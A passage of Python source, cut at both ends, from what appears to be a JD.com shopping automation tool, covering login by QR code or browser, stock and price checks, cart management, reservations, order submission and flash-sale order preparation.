logger.error('获取是否需要验证码失败') return False resp_json = 
json.loads(resp.text[1:-1]) # ({"verifycode":true}) return resp_json['verifycode'] @deprecated def _get_auth_code(self, uuid): image_file = os.path.join(os.getcwd(), 'jd_authcode.jpg') url = 'https://authcode.jd.com/verify/image' payload = { 'a': 1, 'acid': uuid, 'uid': uuid, 'yys': str(int(time.time() * 1000)), } headers = { 'User-Agent': self.user_agent, 'Referer': 'https://passport.jd.com/uc/login', } resp = self.sess.get(url, params=payload, headers=headers) if not response_status(resp): logger.error('获取验证码失败') return '' save_image(resp, image_file) open_image(image_file) return input('验证码:') def _get_login_page(self): url = "https://passport.jd.com/new/login.aspx" page = self.sess.get(url, headers=self.headers) return page @deprecated def _get_login_data(self): page = self._get_login_page() soup = BeautifulSoup(page.text, "html.parser") input_list = soup.select('.form input') # eid & fp are generated by local javascript code according to browser environment return { 'sa_token': input_list[0]['value'], 'uuid': input_list[1]['value'], '_t': input_list[4]['value'], 'loginType': input_list[5]['value'], 'pubKey': input_list[7]['value'], 'eid': self.eid, 'fp': self.fp, } @deprecated def login_by_username(self): if self.is_login: logger.info('登录成功') return True username = input('账号:') password = input('密码:') if (not username) or (not password): logger.error('用户名或密码不能为空') return False self.username = username data = self._get_login_data() uuid = data['uuid'] auth_code = '' if self._need_auth_code(username): logger.info('本次登录需要验证码') auth_code = self._get_auth_code(uuid) else: logger.info('本次登录不需要验证码') login_url = "https://passport.jd.com/uc/loginService" payload = { 'uuid': uuid, 'version': 2015, 'r': random.random(), } data['authcode'] = auth_code data['loginname'] = username data['nloginpwd'] = encrypt_pwd(password) headers = { 'User-Agent': self.user_agent, 'Origin': 'https://passport.jd.com', } resp = self.sess.post(url=login_url, data=data, headers=headers, params=payload) if not response_status(resp): logger.error('登录失败') return False if not self._get_login_result(resp): return False # login success logger.info('登录成功') self.nick_name = self.get_user_info() self._save_cookies() self.is_login = True return True @deprecated def _get_login_result(self, resp): resp_json = parse_json(resp.text) error_msg = '' if 'success' in resp_json: # {"success":"http://www.jd.com"} return True elif 'emptyAuthcode' in resp_json: # {'_t': '_t', 'emptyAuthcode': '请输入验证码'} # {'_t': '_t', 'emptyAuthcode': '验证码不正确或验证码已过期'} error_msg = resp_json['emptyAuthcode'] elif 'username' in resp_json: # {'_t': '_t', 'username': '账户名不存在,请重新输入'} # {'username': '服务器繁忙,请稍后再试', 'venture': 'xxxx', 'p': 'xxxx', 'ventureRet': 'http://www.jd.com/', '_t': '_t'} if resp_json['username'] == '服务器繁忙,请稍后再试': error_msg = resp_json['username'] + '(预计账户存在风险,需短信激活)' else: error_msg = resp_json['username'] elif 'pwd' in resp_json: # {'pwd': '账户名与密码不匹配,请重新输入', '_t': '_t'} error_msg = resp_json['pwd'] else: error_msg = resp_json logger.error(error_msg) return False def _get_QRcode(self): url = 'https://qr.m.jd.com/show' payload = { 'appid': 133, 'size': 147, 't': str(int(time.time() * 1000)), } headers = { 'User-Agent': self.user_agent, 'Referer': 'https://passport.jd.com/', } resp = self.sess.get(url=url, headers=headers, params=payload) if not response_status(resp): logger.info('获取二维码失败') return False QRCode_file = '../QRcode.png' save_image(resp, QRCode_file) logger.info('二维码获取成功,请打开京东APP扫描') open_image(QRCode_file) return True def 
_get_QRcode_ticket(self): url = 'https://qr.m.jd.com/check' payload = { 'appid': '133', 'callback': 'jQuery{}'.format(random.randint(1000000, 9999999)), 'token': self.sess.cookies.get('wlfstk_smdl'), '_': str(int(time.time() * 1000)), } headers = { 'User-Agent': self.user_agent, 'Referer': 'https://passport.jd.com/', } resp = self.sess.get(url=url, headers=headers, params=payload) if not response_status(resp): logger.error('获取二维码扫描结果异常') return False resp_json = parse_json(resp.text) if resp_json['code'] != 200: logger.info('Code: %s, Message: %s', resp_json['code'], resp_json['msg']) return None else: logger.info('已完成手机客户端确认') return resp_json['ticket'] def _validate_QRcode_ticket(self, ticket): url = 'https://passport.jd.com/uc/qrCodeTicketValidation' headers = { 'User-Agent': self.user_agent, 'Referer': 'https://passport.jd.com/uc/login?ltype=logout', } resp = self.sess.get(url=url, headers=headers, params={'t': ticket}) if not response_status(resp): return False resp_json = json.loads(resp.text) if resp_json['returnCode'] == 0: return True else: logger.info(resp_json) return False def login_by_QRcode(self): """二维码登陆 :return: """ br = self.init_browser() domain = '.jd.com' br.openUrl(f'https://www{domain}') br.set_cookies(self.sess.cookies, domain) if self.is_login: logger.info('登录成功') else: self._get_login_page() # download QR code if not self._get_QRcode(): raise AsstException('二维码下载失败') # get QR code ticket ticket = None retry_times = 85 for _ in range(retry_times): ticket = self._get_QRcode_ticket() if ticket: break time.sleep(2) else: raise AsstException('二维码过期,请重新获取扫描') # validate QR code ticket if not self._validate_QRcode_ticket(ticket): raise AsstException('二维码信息校验失败') logger.info('二维码登录成功') self.is_login = True self.nick_name = self.get_user_info() self._save_cookies() # 获取下单必须参数 self.init_order_request_info() def login_by_browser(self): """浏览器登录 :return: """ br = self.init_browser(False) br.client.set_window_size(375, 812) domain = '.m.jd.com' # br.openUrl(f'https://plogin{domain}/login/login') br.openUrl(f'https://plogin{domain}/login/login') # br.openUrl(f'https://passport{domain}/new/login.aspx') br.set_cookies(self.sess.cookies, domain) if self.is_login: # br.openUrl(f'https://m.jd.com/') logger.info('登录成功') else: retry_count = 60 for _ in range(retry_count): pt_key = br.client.get_cookie('pt_key') if pt_key: break time.sleep(2) else: br.quit() raise AsstException('登录时间过长,请重新启动') cookies = br.client.get_cookies() for cookie in cookies: if 'expiry' in cookie: expires = cookie['expiry'] else: expires = None self.sess.cookies.set(cookie['name'], cookie['value'] , domain=cookie['domain'], secure=cookie['secure'], expires=expires) if not self._validate_cookies(): raise AsstException('浏览器登录校验失败') logger.info('浏览器登录成功') self.is_login = True self.nick_name = self.get_user_info() self._save_cookies() # 获取下单必须参数 self.init_order_request_info() def _get_reserve_url(self, sku_id): url = 'https://yushou.jd.com/youshouinfo.action' payload = { 'callback': 'fetchJSON', 'sku': sku_id, } headers = { 'User-Agent': self.user_agent, 'Referer': 'https://item.jd.com/{}.html'.format(sku_id), } resp = self.sess.get(url=url, params=payload, headers=headers) resp_json = parse_json(resp.text) # {"type":"1","hasAddress":false,"riskCheck":"0","flag":false,"num":941723,"stime":"2018-10-12 12:40:00","plusEtime":"","qiangEtime":"","showPromoPrice":"0","qiangStime":"","state":2,"sku":100000287121,"info":"\u9884\u7ea6\u8fdb\u884c\u4e2d","isJ":0,"address":"","d":48824,"hidePrice":"0","yueEtime":"2018-10-19 
15:01:00","plusStime":"","isBefore":0,"url":"//yushou.jd.com/toYuyue.action?sku=100000287121&key=237af0174f1cffffd227a2f98481a338","etime":"2018-10-19 15:01:00","plusD":48824,"category":"4","plusType":0,"yueStime":"2018-10-12 12:40:00"}; reserve_url = resp_json.get('url') return 'https:' + reserve_url if reserve_url else None @check_login def make_reserve(self, sku_id): """商品预约 :param sku_id: 商品id :return: """ reserve_url = self._get_reserve_url(sku_id) if not reserve_url: logger.error('%s 非预约商品', sku_id) return headers = { 'User-Agent': self.user_agent, 'Referer': 'https://item.jd.com/{}.html'.format(sku_id), } resp = self.sess.get(url=reserve_url, headers=headers) soup = BeautifulSoup(resp.text, "html.parser") reserve_result = soup.find('p', {'class': 'bd-right-result'}).text.strip(' \t\r\n') # 预约成功,已获得抢购资格 / 您已成功预约过了,无需重复预约 logger.info(reserve_result) @check_login def new_reserve(self, sku_id): """商品预约 :param sku_id: 商品id :return: """ try: page_url = 'https://wqs.jd.com/item/yuyue_item.shtml' page_payload = { 'sceneval': '2', 'buyNum': '2', 'sku': sku_id, 'isdraw': '', 'activeid': '', 'activetype': '', 'ybServiceId': '', 'homeServiceId': '', 'ycServiceId': '', 'jxsid': str(int(time.time() * 1000)) + str(random.random())[2:7] } page_headers = { 'dnt': '1', 'referer': 'https://item.m.jd.com/', 'sec-fetch-dest': 'document', 'sec-fetch-mode': 'navigate', 'sec-fetch-site': 'same-site', 'sec-fetch-user': '?1', 'upgrade-insecure-requests': '1', 'User-Agent': self.user_agent } page_resp = self.sess.get(url=page_url, params=page_payload, headers=page_headers) page_html = page_resp.text if not page_html: logger.error('商品 %s 预约页面加载失败', sku_id) yuyue_url = 'https://wq.jd.com/bases/yuyue/item' yuyue_payload = { 'callback': f'subscribeItemCB{self.letterMap[1]}', 'dataType': '1', 'skuId': sku_id, 'sceneval': '2' } yuyue_headers = { 'dnt': '1', 'referer': 'https://wqs.jd.com/', 'sec-fetch-dest': 'script', 'sec-fetch-mode': 'no-cors', 'sec-fetch-site': 'same-site', # 'sec-fetch-user': '?1', # 'upgrade-insecure-requests': '1', 'User-Agent': self.user_agent } yuyue_resp = self.sess.get(url=yuyue_url, params=yuyue_payload, headers=yuyue_headers) yuyue_json = yuyue_resp.text if yuyue_json: if '"replyMsg":"预约成功"' in yuyue_json: logger.info("商品 %s 预约成功", sku_id) return True elif 'replyMsg: "您已经成功预约,不需重复预约"' in yuyue_json: logger.info("商品 %s 已经预约", sku_id) return True logger.error('响应数据:%s', yuyue_json) except Exception as e: logger.error(e) logger.error('商品 %s 预约失败,请手动预约', sku_id) return False @check_login def get_user_info(self): """获取用户信息 :return: 用户名 """ if self.use_new: return self.nick_name else: url = 'https://passport.jd.com/user/petName/getUserInfoForMiniJd.action' payload = { 'callback': 'jQuery{}'.format(random.randint(1000000, 9999999)), '_': str(int(time.time() * 1000)), } headers = { 'User-Agent': self.user_agent, 'Referer': 'https://order.jd.com/center/list.action', } try: resp = self.sess.get(url=url, params=payload, headers=headers) resp_json = parse_json(resp.text) # many user info are included in response, now return nick name in it # jQuery2381773({"imgUrl":"//storage.360buyimg.com/i.imageUpload/xxx.jpg","lastLoginTime":"","nickName":"xxx","plusStatus":"0","realName":"xxx","userLevel":x,"userScoreVO":{"accountScore":xx,"activityScore":xx,"consumptionScore":xxxxx,"default":false,"financeScore":xxx,"pin":"xxx","riskScore":x,"totalScore":xxxxx}}) return resp_json.get('nickName') or 'jd' except Exception: return 'jd' def new_get_item_detail_page(self, sku_id): """访问商品详情页 :param sku_id: 商品id 
:return: 响应 """ url = 'https://item.m.jd.com/product/{}.html'.format(sku_id) headers = self.headers.copy() headers['dnt'] = '1' headers['sec-fetch-user'] = '?1' headers['sec-fetch-site'] = 'none' headers['sec-fetch-mode'] = 'navigate' headers['sec-fetch-dest'] = 'document' headers['upgrade-insecure-requests'] = '1' page = self.sess.get(url=url, headers=headers) return page def _get_item_detail_page(self, sku_id): """访问商品详情页 :param sku_id: 商品id :return: 响应 """ url = 'https://item.jd.com/{}.html'.format(sku_id) page = requests.get(url=url, headers=self.headers) return page def get_single_item_stock(self, sku_id, num, area): """获取单个商品库存状态 :param sku_id: 商品id :param num: 商品数量 :param area: 地区id :return: 商品是否有货 True/False """ area_id = parse_area_id(area) cat = self.item_cat.get(sku_id) vender_id = self.item_vender_ids.get(sku_id) if not cat: page = self._get_item_detail_page(sku_id) match = re.search(r'cat: \[(.*?)\]', page.text) cat = match.group(1) self.item_cat[sku_id] = cat match = re.search(r'venderId:(\d*?),', page.text) vender_id = match.group(1) self.item_vender_ids[sku_id] = vender_id url = 'https://c0.3.cn/stock' payload = { 'skuId': sku_id, 'buyNum': num, 'area': area_id, 'ch': 1, '_': str(int(time.time() * 1000)), 'callback': 'jQuery{}'.format(random.randint(1000000, 9999999)), 'extraParam': '{"originid":"1"}', # get error stock state without this param 'cat': cat, # get 403 Forbidden without this param (obtained from the detail page) 'venderId': vender_id # return seller information with this param (can't be ignored) } headers = { 'User-Agent': self.user_agent, 'Referer': 'https://item.jd.com/{}.html'.format(sku_id), } resp_text = '' try: resp_text = requests.get(url=url, params=payload, headers=headers, timeout=self.timeout).text resp_json = parse_json(resp_text) stock_info = resp_json.get('stock') sku_state = stock_info.get('skuState') # 商品是否上架 stock_state = stock_info.get('StockState') # 商品库存状态:33 -- 现货 0,34 -- 无货 36 -- 采购中 40 -- 可配货 return sku_state == 1 and stock_state in (33, 40) except requests.exceptions.Timeout: logger.error('查询 %s 库存信息超时(%ss)', sku_id, self.timeout) return False except requests.exceptions.RequestException as request_exception: logger.error('查询 %s 库存信息发生网络请求异常:%s', sku_id, request_exception) return False except Exception as e: logger.error('查询 %s 库存信息发生异常, resp: %s, exception: %s', sku_id, resp_text, e) return False @check_login def get_multi_item_stock(self, sku_ids, area): """获取多个商品库存状态(旧) 该方法需要登陆才能调用,用于同时查询多个商品的库存。 京东查询接口返回每种商品的状态:有货/无货。当所有商品都有货,返回True;否则,返回False。 :param sku_ids: 多个商品的id。可以传入中间用英文逗号的分割字符串,如"123,456" :param area: 地区id :return: 多个商品是否同时有货 True/False """ items_dict = parse_sku_id(sku_ids=sku_ids) area_id_list = split_area_id(area) url = 'https://trade.jd.com/api/v1/batch/stock' headers = { 'User-Agent': self.user_agent, 'Origin': 'https://trade.jd.com', 'Content-Type': 'application/json; charset=UTF-8', 'Referer': 'https://trade.jd.com/shopping/order/getOrderInfo.action?rid=' + str(int(time.time() * 1000)), } data = { "areaRequest": { "provinceId": area_id_list[0], "cityId": area_id_list[1], "countyId": area_id_list[2], "townId": area_id_list[3] }, "skuNumList": [] } for sku_id, count in items_dict.items(): data['skuNumList'].append({ "skuId": sku_id, "num": count }) # convert to string data = json.dumps(data) try: resp = self.sess.post(url=url, headers=headers, data=data, timeout=self.timeout) except requests.exceptions.Timeout: logger.error('查询 %s 库存信息超时(%ss)', list(items_dict.keys()), self.timeout) return False except 
requests.exceptions.RequestException as e: raise AsstException('查询 %s 库存信息异常:%s' % (list(items_dict.keys()), e)) resp_json = parse_json(resp.text) result = resp_json.get('result') stock = True for sku_id in result: status = result.get(sku_id).get('status') if '无货' in status: stock = False break return stock def get_multi_item_stock_new(self, sku_ids, area): """获取多个商品库存状态(新) 当所有商品都有货,返回True;否则,返回False。 :param sku_ids: 多个商品的id。可以传入中间用英文逗号的分割字符串,如"123,456" :param area: 地区id :return: 多个商品是否同时有货 True/False """ items_dict = parse_sku_id(sku_ids=sku_ids) area_id = parse_area_id(area=area) url = 'https://c0.3.cn/stocks' payload = { 'callback': 'jQuery{}'.format(random.randint(1000000, 9999999)), 'type': 'getstocks', 'skuIds': ','.join(items_dict.keys()), 'area': area_id, '_': str(int(time.time() * 1000)) } headers = { 'User-Agent': self.user_agent } resp_text = '' try: resp_text = requests.get(url=url, params=payload, headers=headers, timeout=self.timeout).text stock = True for sku_id, info in parse_json(resp_text).items(): sku_state = info.get('skuState') # 商品是否上架 stock_state = info.get('StockState') # 商品库存状态 if sku_state == 1 and stock_state in (33, 40): continue else: stock = False break return stock except requests.exceptions.Timeout: logger.error('查询 %s 库存信息超时(%ss)', list(items_dict.keys()), self.timeout) return False except requests.exceptions.RequestException as request_exception: logger.error('查询 %s 库存信息发生网络请求异常:%s', list(items_dict.keys()), request_exception) return False except Exception as e: logger.error('查询 %s 库存信息发生异常, resp: %s, exception: %s', list(items_dict.keys()), resp_text, e) return False def _if_item_removed(self, sku_id): """判断商品是否下架 :param sku_id: 商品id :return: 商品是否下架 True/False """ detail_page = self._get_item_detail_page(sku_id=sku_id) return '该商品已下柜' in detail_page.text @check_login def if_item_can_be_ordered(self, sku_ids, area): """判断商品是否能下单 :param sku_ids: 商品id,多个商品id中间使用英文逗号进行分割 :param area: 地址id :return: 商品是否能下单 True/False """ items_dict = parse_sku_id(sku_ids=sku_ids) area_id = parse_area_id(area) # 判断商品是否能下单 if len(items_dict) > 1: return self.get_multi_item_stock_new(sku_ids=items_dict, area=area_id) sku_id, count = list(items_dict.items())[0] return self.get_single_item_stock(sku_id=sku_id, num=count, area=area_id) def get_item_price(self, sku_id): """获取商品价格 :param sku_id: 商品id :return: 价格 """ url = 'http://p.3.cn/prices/mgets' payload = { 'type': 1, 'pduid': int(time.time() * 1000), 'skuIds': 'J_' + sku_id, } resp = self.sess.get(url=url, params=payload) return parse_json(resp.text).get('p') @check_login def add_item_to_cart(self, sku_ids): """添加商品到购物车 重要: 1.商品添加到购物车后将会自动被勾选✓中。 2.在提交订单时会对勾选的商品进行结算。 3.部分商品(如预售、下架等)无法添加到购物车 京东购物车可容纳的最大商品种数约为118-120种,超过数量会加入购物车失败。 :param sku_ids: 商品id,格式:"123" 或 "123,456" 或 "123:1,456:2"。若不配置数量,默认为1个。 :return: """ add_cart_request = self.request_info['add_cart_request'] for sku_id, count in parse_sku_id(sku_ids=sku_ids).items(): payload = { 'pid': sku_id, 'pcount': count, 'ptype': 1, } add_cart_request(payload) @check_login def clear_cart(self): """清空购物车 包括两个请求: 1.选中购物车中所有的商品 2.批量删除 :return: 清空购物车结果 True/False """ # 1.select all items 2.batch remove items select_url = 'https://cart.jd.com/selectAllItem.action' remove_url = 'https://cart.jd.com/batchRemoveSkusFromCart.action' data = { 't': 0, 'outSkus': '', 'random': random.random(), } try: select_resp = self.sess.post(url=select_url, data=data) time.sleep(2) remove_resp = self.sess.post(url=remove_url, data=data) if (not response_status(select_resp)) or (not 
response_status(remove_resp)): logger.error('购物车清空失败') return False logger.info('购物车清空成功') return True except Exception as e: logger.error(e) return False @check_login def get_cart_detail(self): """获取购物车商品详情 :return: 购物车商品信息 dict """ url = 'https://cart.jd.com/cart.action' resp = self.sess.get(url) soup = BeautifulSoup(resp.text, "html.parser") cart_detail = dict() for item in soup.find_all(class_='item-item'): try: sku_id = item['skuid'] # 商品id # 例如:['increment', '8888', '100001071956', '1', '13', '0', '50067652554'] # ['increment', '8888', '100002404322', '2', '1', '0'] item_attr_list = item.find(class_='increment')['id'].split('_') p_type = item_attr_list[4] promo_id = target_id = item_attr_list[-1] if len(item_attr_list) == 7 else 0 cart_detail[sku_id] = { 'name': get_tag_value(item.select('div.p-name a')), # 商品名称 'verder_id': item['venderid'], # 商家id 'count': int(item['num']), # 数量 'unit_price': get_tag_value(item.select('div.p-price strong'))[1:], # 单价 'total_price': get_tag_value(item.select('div.p-sum strong'))[1:], # 总价 'is_selected': 'item-selected' in item['class'], # 商品是否被勾选 'p_type': p_type, 'target_id': target_id, 'promo_id': promo_id } except Exception as e: logger.error("某商品在购物车中的信息无法解析,报错信息: %s,该商品自动忽略。 %s", e, item) logger.info('购物车信息:%s', cart_detail) return cart_detail def _cancel_select_all_cart_item(self): """取消勾选购物车中的所有商品 :return: 取消勾选结果 True/False """ url = "https://cart.jd.com/cancelAllItem.action" data = { 't': 0, 'outSkus': '', 'random': random.random() # 'locationId' can be ignored } resp = self.sess.post(url, data=data) return response_status(resp) def _change_item_num_in_cart(self, sku_id, vender_id, num, p_type, target_id, promo_id): """修改购物车商品的数量 修改购物车中商品数量后,该商品将会被自动勾选上。 :param sku_id: 商品id :param vender_id: 商家id :param num: 目标数量 :param p_type: 商品类型(可能) :param target_id: 参数用途未知,可能是用户判断优惠 :param promo_id: 参数用途未知,可能是用户判断优惠 :return: 商品数量修改结果 True/False """ url = "https://cart.jd.com/changeNum.action" data = { 't': 0, 'venderId': vender_id, 'pid': sku_id, 'pcount': num, 'ptype': p_type, 'targetId': target_id, 'promoID': promo_id, 'outSkus': '', 'random': random.random(), # 'locationId' } headers = { 'User-Agent': self.user_agent, 'Referer': 'https://cart.jd.com/cart', } resp = self.sess.post(url, data=data, headers=headers) return json.loads(resp.text)['sortedWebCartResult']['achieveSevenState'] == 2 def _add_or_change_cart_item(self, cart, sku_id, count): """添加商品到购物车,或修改购物车中商品数量 如果购物车中存在该商品,会修改该商品的数量并勾选;否则,会添加该商品到购物车中并勾选。 :param cart: 购物车信息 dict :param sku_id: 商品id :param count: 商品数量 :return: 运行结果 True/False """ if sku_id in cart: logger.info('%s 已在购物车中,调整数量为 %s', sku_id, count) cart_item = cart.get(sku_id) return self._change_item_num_in_cart( sku_id=sku_id, vender_id=cart_item.get('vender_id'), num=count, p_type=cart_item.get('p_type'), target_id=cart_item.get('target_id'), promo_id=cart_item.get('promo_id') ) else: logger.info('%s 不在购物车中,开始加入购物车,数量 %s', sku_id, count) return self.add_item_to_cart(sku_ids={sku_id: count}) @check_login def get_checkout_page_detail(self): """获取订单结算页面信息 该方法会返回订单结算页面的详细信息:商品名称、价格、数量、库存状态等。 :return: 结算信息 dict """ get_checkout_page_request = self.request_info['get_checkout_page_request'] payload = { 'rid': str(int(time.time() * 1000)), } get_checkout_page_request(payload) def _save_invoice(self): """下单第三方商品时如果未设置发票,将从电子发票切换为普通发票 http://jos.jd.com/api/complexTemplate.htm?webPamer=invoice&groupName=%E5%BC%80%E6%99%AE%E5%8B%92%E5%85%A5%E9%A9%BB%E6%A8%A1%E5%BC%8FAPI&id=566&restName=jd.kepler.trade.submit&isMulti=true :return: """ url = 
'https://trade.jd.com/shopping/dynamic/invoice/saveInvoice.action' data = { "invoiceParam.selectedInvoiceType": 1, "invoiceParam.companyName": "个人", "invoiceParam.invoicePutType": 0, "invoiceParam.selectInvoiceTitle": 4, "invoiceParam.selectBookInvoiceContent": "", "invoiceParam.selectNormalInvoiceContent": 1, "invoiceParam.vatCompanyName": "", "invoiceParam.code": "", "invoiceParam.regAddr": "", "invoiceParam.regPhone": "", "invoiceParam.regBank": "", "invoiceParam.regBankAccount": "", "invoiceParam.hasCommon": "true", "invoiceParam.hasBook": "false", "invoiceParam.consigneeName": "", "invoiceParam.consigneePhone": "", "invoiceParam.consigneeAddress": "", "invoiceParam.consigneeProvince": "请选择:", "invoiceParam.consigneeProvinceId": "NaN", "invoiceParam.consigneeCity": "请选择", "invoiceParam.consigneeCityId": "NaN", "invoiceParam.consigneeCounty": "请选择", "invoiceParam.consigneeCountyId": "NaN", "invoiceParam.consigneeTown": "请选择", "invoiceParam.consigneeTownId": 0, "invoiceParam.sendSeparate": "false", "invoiceParam.usualInvoiceId": "", "invoiceParam.selectElectroTitle": 4, "invoiceParam.electroCompanyName": "undefined", "invoiceParam.electroInvoiceEmail": "", "invoiceParam.electroInvoicePhone": "", "invokeInvoiceBasicService": "true", "invoice_ceshi1": "", "invoiceParam.showInvoiceSeparate": "false", "invoiceParam.invoiceSeparateSwitch": 1, "invoiceParam.invoiceCode": "", "invoiceParam.saveInvoiceFlag": 1 } headers = { 'User-Agent': self.user_agent, 'Referer': 'https://trade.jd.com/shopping/dynamic/invoice/saveInvoice.action', } self.sess.post(url=url, data=data, headers=headers) @check_login def submit_order(self): """提交订单 重要: 1.该方法只适用于普通商品的提交订单(即可以加入购物车,然后结算提交订单的商品) 2.提交订单时,会对购物车中勾选✓的商品进行结算(如果勾选了多个商品,将会提交成一个订单) :return: True/False 订单提交结果 """ submit_order_request = self.request_info['submit_order_request'] return submit_order_request() @check_login def submit_order_with_retry(self, retry=3, interval=4): """提交订单,并且带有重试功能 :param retry: 重试次数 :param interval: 重试间隔 :return: 订单提交结果 True/False """ for i in range(1, retry + 1): logger.info('第[%s/%s]次尝试提交订单', i, retry) self.get_checkout_page_detail() if self.submit_order(): logger.info('第%s次提交订单成功', i) return True else: if i < retry: logger.info('第%s次提交失败,%ss后重试', i, interval) time.sleep(interval) else: logger.info('重试提交%s次结束', retry) return False @check_login def submit_order_by_time(self, buy_time, retry=4, interval=5): """定时提交商品订单 重要:该方法只适用于普通商品的提交订单,事先需要先将商品加入购物车并勾选✓。 :param buy_time: 下单时间,例如:'2018-09-28 22:45:50.000' :param retry: 下单重复执行次数,可选参数,默认4次 :param interval: 下单执行间隔,可选参数,默认5秒 :return: """ t = Timer(buy_time=buy_time) t.start() for count in range(1, retry + 1): logger.info('第[%s/%s]次尝试提交订单', count, retry) if self.submit_order(): break logger.info('休息%ss', interval) time.sleep(interval) else: logger.info('执行结束,提交订单失败!') @check_login def get_order_info(self, unpaid=True): """查询订单信息 :param unpaid: 只显示未付款订单,可选参数,默认为True :return: """ url = 'https://order.jd.com/center/list.action' payload = { 'search': 0, 'd': 1, 's': 4096, } # Orders for nearly three months headers = { 'User-Agent': self.user_agent, 'Referer': 'https://passport.jd.com/uc/login?ltype=logout', } try: resp = self.sess.get(url=url, params=payload, headers=headers) if not response_status(resp): logger.error('获取订单页信息失败') return soup = BeautifulSoup(resp.text, "html.parser") logger.info('************************订单列表页查询************************') order_table = soup.find('table', {'class': 'order-tb'}) table_bodies = order_table.select('tbody') exist_order = False for table_body in 
table_bodies: # get order status order_status = get_tag_value(table_body.select('span.order-status')).replace("订单状态:", "") # check if order is waiting for payment # wait_payment = bool(table_body.select('a.btn-pay')) wait_payment = "等待付款" in order_status # only show unpaid orders if unpaid=True if unpaid and (not wait_payment): continue exist_order = True # get order_time, order_id tr_th = table_body.select('tr.tr-th')[0] order_time = get_tag_value(tr_th.select('span.dealtime')) order_id = get_tag_value(tr_th.select('span.number a')) # get sum_price, pay_method sum_price = '' pay_method = '' amount_div = table_body.find('div', {'class': 'amount'}) if amount_div: spans = amount_div.select('span') pay_method = get_tag_value(spans, index=1) # if the order is waiting for payment, the price after the discount is shown. sum_price = get_tag_value(amount_div.select('strong'), index=1)[1:] if wait_payment \ else get_tag_value(spans, index=0)[4:] # get name and quantity of items in order items_dict = dict() # {'item_id_1': quantity_1, 'item_id_2': quantity_2, ...} tr_bds = table_body.select('tr.tr-bd') for tr_bd in tr_bds: item = tr_bd.find('div', {'class': 'goods-item'}) if not item: break item_id = item.get('class')[1][2:] quantity = get_tag_value(tr_bd.select('div.goods-number'))[1:] items_dict[item_id] = quantity order_info_format = '下单时间:{0}----订单号:{1}----商品列表:{2}----订单状态:{3}----总金额:{4}元----付款方式:{5}' logger.info(order_info_format.format(order_time, order_id, parse_items_dict(items_dict), order_status, sum_price, pay_method)) if not exist_order: logger.info('订单查询为空') except Exception as e: logger.error(e) @deprecated def _get_seckill_url(self, sku_id, server_buy_time=int(time.time())): """获取商品的抢购链接 点击"抢购"按钮后,会有两次302跳转,最后到达订单结算页面 这里返回第一次跳转后的页面url,作为商品的抢购链接 :param sku_id: 商品id :return: 商品的抢购链接 """ url = 'https://itemko.jd.com/itemShowBtn' payload = { 'callback': 'jQuery{}'.format(random.randint(1000000, 9999999)), 'skuId': sku_id, 'from': 'pc', '_': str(server_buy_time * 1000), } headers = { 'User-Agent': self.user_agent, 'Host': 'itemko.jd.com', 'Referer': 'https://item.jd.com/{}.html'.format(sku_id), } retry_interval = global_config.retry_interval retry_count = 0 while retry_count < 10: resp = self.sess.get(url=url, headers=headers, params=payload, timeout=(0.1, 0.08)) resp_json = parse_json(resp.text) if resp_json.get('url'): # https://divide.jd.com/user_routing?skuId=8654289&sn=c3f4ececd8461f0e4d7267e96a91e0e0&from=pc router_url = 'https:' + resp_json.get('url') # https://marathon.jd.com/captcha.html?skuId=8654289&sn=c3f4ececd8461f0e4d7267e96a91e0e0&from=pc seckill_url = router_url.replace('divide', 'marathon').replace('user_routing', 'captcha.html') logger.info("抢购链接获取成功: %s", seckill_url) return seckill_url else: retry_count += 1 logger.info("第%s次获取抢购链接失败,%s不是抢购商品或抢购页面暂未刷新,%s秒后重试", retry_count, sku_id, retry_interval) time.sleep(retry_interval) logger.error("抢购链接获取失败,终止抢购!") exit(-1) def request_seckill_url(self, sku_id, server_buy_time): """访问商品的抢购链接(用于设置cookie等) :param sku_id: 商品id :return: """ if not self.seckill_url.get(sku_id): seckill_url = self.request_info['get_sku_seckill_url_request'](sku_id, server_buy_time) if seckill_url is not None: self.seckill_url[sku_id] = seckill_url else: return None return self.request_info['request_sku_seckill_url_request'](sku_id) @deprecated def request_seckill_checkout_page(self, sku_id, num=1): """访问抢购订单结算页面 :param sku_id: 商品id :param num: 购买数量,可选参数,默认1个 :return: """ url = 'https://marathon.jd.com/seckill/seckill.action' payload = { 'skuId': sku_id, 
'num': num, 'rid': int(time.time()) } headers = { 'User-Agent': self.user_agent, 'Host': 'marathon.jd.com', 'Referer': 'https://item.jd.com/{}.html'.format(sku_id), } self.sess.get(url=url, params=payload, headers=headers, timeout=(0.1, 0.08)) def _get_seckill_init_info(self, sku_id, num=1): """获取秒杀初始化信息(包括:地址,发票,token) :param sku_id: :param num: 购买数量,可选参数,默认1个 :return: 初始化信息组成的dict """ count = 1 while count < 8: logger.info('第 %s 次获取秒杀初始化信息', count) content = self.request_info['get_seckill_init_info_request'](sku_id, num) try: if 'koFail' in content: logger.error('抢购失败,请求重定向,地址:%s', content) else: return parse_json(content) except Exception as e: logger.error('获取秒杀初始化信息失败,响应数据:%s,异常:%s', content, e) count += 1 def _gen_seckill_order_data(self, sku_id, num=1): """生成提交抢购订单所需的请求体参数 :param sku_id: 商品id :param num: 购买数量,可选参数,默认1个 :return: 请求体参数组成的dict """ # 获取用户秒杀初始化信息 init_info = self.seckill_init_info.get(sku_id) if not init_info: init_info = self._get_seckill_init_info(sku_id) self.seckill_init_info[sku_id] = init_info default_address = init_info['addressList'][0] # 默认地址dict invoice_info = init_info.get('invoiceInfo', {}) # 默认发票信息dict, 有可能不返回 token = init_info['token'] data = { 'skuId': sku_id, 'num': num, 'addressId': default_address['id'], 'yuShou': str(bool(int(init_info['seckillSkuVO']['extMap'].get('YuShou', '0')))).lower(), 'isModifyAddress': 'false', 'name': default_address['name'], 'provinceId': default_address['provinceId'], 'cityId': default_address['cityId'], 'countyId': default_address['countyId'], 'townId': default_address['townId'], 'addressDetail': default_address['addressDetail'], 'mobile': default_address['mobile'], 'mobileKey': default_address['mobileKey'], 'email': default_address.get('email', ''), 'postCode': '', 'invoiceTitle': invoice_info.get('invoiceTitle', -1), 'invoiceCompanyName': '', 'invoiceContent': invoice_info.get('invoiceContentType', 1), 'invoiceTaxpayerNO': '', 'invoiceEmail': '', 'invoicePhone': invoice_info.get('invoicePhone', ''), 'invoicePhoneKey': invoice_info.get('invoicePhoneKey', ''), 'invoice': 'true' if invoice_info else 'false', 'password': global_config.get('account', 'payment_pwd'), 'codTimeType': 3, 'paymentType': 4, 'areaCode': '', 'overseas': 0, 'phone': '', 'eid': self.eid, 'fp': self.fp, 